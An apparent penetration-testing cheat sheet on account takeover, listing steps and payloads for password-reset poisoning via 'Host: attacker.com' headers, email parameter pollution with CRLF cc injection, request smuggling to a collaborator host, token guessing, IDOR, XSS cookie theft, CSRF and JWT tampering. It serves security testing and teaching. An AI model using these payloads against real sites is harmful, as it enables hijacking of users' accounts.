- Password Reset Feature
- Account Takeover Via Cross Site Scripting
- Account Takeover Via HTTP Request Smuggling
- Account Takeover via CSRF
- References
- Request password reset to your email address
- Click on the password reset link
- Don't change password
- Click any 3rd party websites(eg: Facebook, twitter)
- Intercept the request in Burp Suite proxy
- Check if the referer header is leaking password reset token.
- Intercept the password reset request in Burp Suite
- Add or edit the following headers in Burp Suite :
Host: attacker.com
,X-Forwarded-Host: attacker.com
- Forward the request with the modified header
POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
- Look for a password reset URL based on the host header like :
https://attacker.com/reset-password.php?token=TOKEN
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["[email protected]","[email protected]"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
- Attacker have to login with their account and go to the Change password feature.
- Start the Burp Suite and Intercept the request
- Send it to the repeater tab and edit the parameters : User ID/email
POST /api/changepass [...] ("form": {"email":"[email protected]","password":"securepwd"})
The password reset token should be randomly generated and unique every time. Try to determine if the token expire or if it's always the same, in some cases the generation algorithm is weak and can be guessed. The following variables might be used by the algorithm.
- Timestamp
- UserID
- Email of User
- Firstname and Lastname
- Date of Birth
- Cryptography
- Number only
- Small token sequence (<6 characters between [A-Z,a-z,0-9])
- Token reuse
- Token expiration date
- Trigger a password reset request using the API/UI for a specific email e.g: [email protected]
- Inspect the server response and check for
resetToken
- Then use the token in an URL like
https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
- Register on the system with a username identical to the victim's username, but with white spaces inserted before and/or after the username. e.g:
"admin "
- Request a password reset with your malicious username.
- Use the token sent to your email and reset the victim password.
- Connect to the victim account with the new password.
The platform CTFd was vulnerable to this attack. See: CVE-2020-7245
- Find an XSS inside the application or a subdomain if the cookies are scoped to the parent domain :
*.domain.com
- Leak the current sessions cookie
- Authenticate as the user using the cookie
Refer to HTTP Request Smuggling vulnerability page.
- Use smuggler to detect the type of HTTP Request Smuggling (CL, TE, CL.TE)
git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
- Craft a request which will overwrite the
POST / HTTP/1.1
with the following data:GET http://something.burpcollaborator.net HTTP/1.1 X:
- Final request could look like the following
GET / HTTP/1.1 Transfer-Encoding: chunked Host: something.com User-Agent: Smuggler/v1.0 Content-Length: 83 0 GET http://something.burpcollaborator.net HTTP/1.1 X: X
Hackerone reports exploiting this bug
- Create a payload for the CSRF, e.g: "HTML form with auto submit for a password change"
- Send the payload
JSON Web Token might be used to authenticate an user.
- Edit the JWT with another User ID / Email
- Check for weak JWT signature
- Broken cryptography
- Session hijacking
- OAuth misconfiguration
- 10 Password Reset Flaws - Anugrah SR
- $6,5k + $5k HTTP Request Smuggling mass account takeover - Slack + Zomato - Bug Bounty Reports Explained
- Broken Cryptography & Account Takeovers - Harsh Bothra - September 20, 2020
- Hacking Grindr Accounts with Copy and Paste - Troy HUNT & Wassime BOUIMADAGHENE - 03 OCTOBER 2020
- CTFd Account Takeover